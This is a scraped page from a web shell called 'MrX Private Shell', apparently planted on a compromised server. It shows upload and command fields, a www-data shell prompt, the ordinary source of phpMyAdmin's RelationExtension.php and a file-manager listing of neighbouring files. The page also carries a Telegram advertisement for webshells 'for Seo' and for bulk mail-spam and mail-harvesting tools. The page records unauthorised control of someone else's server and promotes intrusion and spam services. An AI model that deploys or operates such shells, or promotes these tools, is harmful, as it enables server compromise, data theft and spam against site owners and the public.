__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php

declare(strict_types=1);

namespace PhpMyAdmin\Twig;

use PhpMyAdmin\ConfigStorage\Relation;
use Twig\Extension\AbstractExtension;
use Twig\TwigFunction;

class RelationExtension extends AbstractExtension
{
    /**
     * Returns a list of functions to add to the existing list.
     *
     * @return TwigFunction[]
     */
    public function getFunctions()
    {
        global $dbi;

        $relation = new Relation($dbi);

        return [
            new TwigFunction(
                'foreign_dropdown',
                [$relation, 'foreignDropdown'],
                ['is_safe' => ['html']]
            ),
            new TwigFunction(
                'get_display_field',
                [$relation, 'getDisplayField'],
                ['is_safe' => ['html']]
            ),
            new TwigFunction(
                'get_foreign_data',
                [$relation, 'getForeignData']
            ),
            new TwigFunction(
                'get_tables',
                [$relation, 'getTables']
            ),
            new TwigFunction(
                'search_column_in_foreigners',
                [$relation, 'searchColumnInForeigners']
            ),
        ];
    }
}

Filemanager

Name Type Size Permission Actions
AssetExtension.php File 649 B 0644
CoreExtension.php File 486 B 0644
FlashMessagesExtension.php File 389 B 0644
I18nExtension.php File 673 B 0644
MessageExtension.php File 1.1 KB 0644
RelationExtension.php File 1.17 KB 0644
SanitizeExtension.php File 1.23 KB 0644
TableExtension.php File 500 B 0644
TrackerExtension.php File 523 B 0644
TransformationsExtension.php File 711 B 0644
UrlExtension.php File 1.17 KB 0644
UtilExtension.php File 5.1 KB 0644
Filemanager